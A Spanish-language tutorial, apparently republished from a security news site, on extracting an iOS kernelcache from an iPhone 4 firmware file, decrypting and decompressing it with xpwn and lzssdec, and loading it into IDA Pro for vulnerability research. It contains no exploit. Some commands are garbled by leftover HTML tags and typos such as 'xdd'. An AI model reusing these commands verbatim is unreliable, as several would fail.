El núcleo de IOS se basa en el núcleo de XNU con algunas modificaciones. Este núcleo es un código abierto. Una vez que tenga una versión binaria del núcleo, necesitaras utilizar algunas herramientas de ingeniería inversa para completar tu análisis. En iOS en lugar de encontrar un núcleo independiente, nos encontraremos con un “kernelcache”. Según expertos de análisis de vulnerabilidades informáticas de organización de ciberseguridad el kernelcache es esencialmente un contenedor para el núcleo en sí mismo y todas las extensiones (kexts para los más familiarizados con OS X), empacadas juntas.

¿CÓMO HACERLO?

En la primera parte del artículo, asumiremos que se está ejecutando en una nueva instalación de Santoku Linux, así podemos continuar juntos.

Para extraer la memoria caché del núcleo se pueden extraer y descifrar desde su teléfono, o extraer y descifrar el archivo. Ipsw. Un archivo IPSW es un archivo que contiene el firmware y actualizaciones para el dispositivo. Con el fin de encontrar dónde descargar nuestro objetivo IPSW de Internet podemos buscar en internet.

En este ejemplo hemos elegido para extraer un IPSW de iOS 7.0.2 para el iPhone 4, descargable desde Internet.

A continuación, en de la terminal nosotros haremos:

wget http://appldnld.apple.com/iOS7/091-9871.20130924.7imYu/iPhone3,1_7.0.2_11A501_Restore.ipsw

unzip iPhone3,1_7.0.2_11A501_Restore.ipsw

Como podemos ver que hay un archivo kernelcache.release.n90. Nosotros vamos a descifrar este archivo con algunas herramientas disponibles libremente y analizarlo en IDA Pro. Para ello, necesitaremos de xpwn y las herramientas de lzssdec.

Primero instalamos algunas dependencias y herramientas:

sudo apt-get install git build-essential libz-dev libbz2-dev libusb-dev cmake libpng12-dev

git clone <a href=”https://github.com/planetbeing/xpwn.git”>https://github.com/planetbeing/xpwn.git</a&gt;

cd xpwn/

ls

IOS reverse engineer

LA CARPETA XPWNTOOL

En la carpeta de BUILD podemos encontrar las instrucciones para construir la herramienta, o simplemente seguir esta guía:

mkdir build

cd build

cmake ../

make

Ahora encontraras xpwtool bajo la subcarpeta ipsw-patch:

IOS reverse engineer1

LA LOCACIÓN DE XPWNTOOL

Ahora podemos copiar el xpwntool en nuestro directorio con nuestro kernelcache encriptado. Ahora necesitas encontrar tu IV y Key para  tu tipo particular de dispositivo y archivo (kernelcache). Ellos no serán incluidos en esta guía, pero puedes descargarlos desde su dispositivo con jailbreak (que es modelo de dispositivo, archivo, y la versión específica de IOS) o encontrarlos en línea el archivo kernelcache.

Según expertos de análisis de vulnerabilidades informáticas de organización de ciberseguridad, también necesitará la clave AES y IV para el archivo. Estos se almacenan en el archivo encriptado con la clave de GID en el dispositivo. Esta clave GID está en el hardware del dispositivo y que es compartido entre los dispositivos que se tienen el mismo procesador.

./xpwntool kernelcache.release.n90 kernelcache.decrypted -iv [MY_IV] -k [MY_KEY] -decrypt

IOS reverse engineer2

UNA LISTA DE LOS ARCHIVOS DESCIFRADOS CON KERNELCACHE:

Para obtener un valido Mach-O ejecutable para analizar en IDA Pro vamos a tener que utilizar otra herramienta, lzssdec.

wget <a href=”http://nah6.com/~itsme/cvs-xdadevtools/iphone/tools/lzssdec.cpp”>http://nah6.com/~itsme/cvs-xdadevtools/iphone/tools/lzssdec.cpp</a>       g++ lzssdec.cpp -o lzssdec</em>

IOS reverse engineer3

LZSSDEC COMPILADO

Podemos ejecutar lzssdec sobre la imagen descifrada:

./lzssdec -o 448 < kernelcache.decrypted > kernelcache.mach.arm

Podemos comprobar el resultado con:

xdd kernelcache.mach.arm | head

Y ver que los primeros bytes son:

0xfeedface

IOS reverse engineer4

VER LOS RESULTADOS EN SANTOKU-LINUX

Usando comando de file:

file kernelcache.mach.arm

Ahora podemos tomar nuestro kernelcache.mach.arm y ponerlo en IDA Pro. Vamos a utilizar IDA Pro en Windows con HexRays eventualmente. Abrimos el kernelcache.mach.arm con IDA Pro.

IOS reverse engineer5

KERNELCACHE.MACH.ARM EN IDA PRO

Dan Heyes, consultor de análisis de vulnerabilidades informáticas de organización de ciberseguridad menciona que la herramienta nos preguntará si queremos dividir el núcleo en las muchas kexts que se combinan en el interior (en el núcleo IOS y las extensiones cargables de kext están todos empacados dentro de kernelcache). Elegir sí y confirmando las otras ventanas para iniciar el análisis.

IOS reverse engineer6

IOS reverse engineer7

ÁREAS INEXPLORADAS EN EL ANÁLISIS IDA PRO

Observe todas las áreas inexploradas por IDA, veremos que al final del análisis vamos a tener una idea más clara de lo que está pasando en el archivo binario.

Cuando se termina el análisis, podemos guardar la base de datos y eventualmente tomar una copia de seguridad.

IOS reverse engineer8

ANÁLISIS TERMINADO EN IDA PRO

Ahora podemos empezar a ingeniería reversa del núcleo IOS y ajustar el análisis automático inicial hecho por IDA Pro. Según expertos organización de ciberseguridad, ingeniería reversa del núcleo IOS ayudaría hacer análisis de vulnerabilidades informáticas en el núcleo IOS.

Fuente:http://noticiasseguridad.com/vulnerabilidades/como-hacer-ingenieria-reversa-del-ios/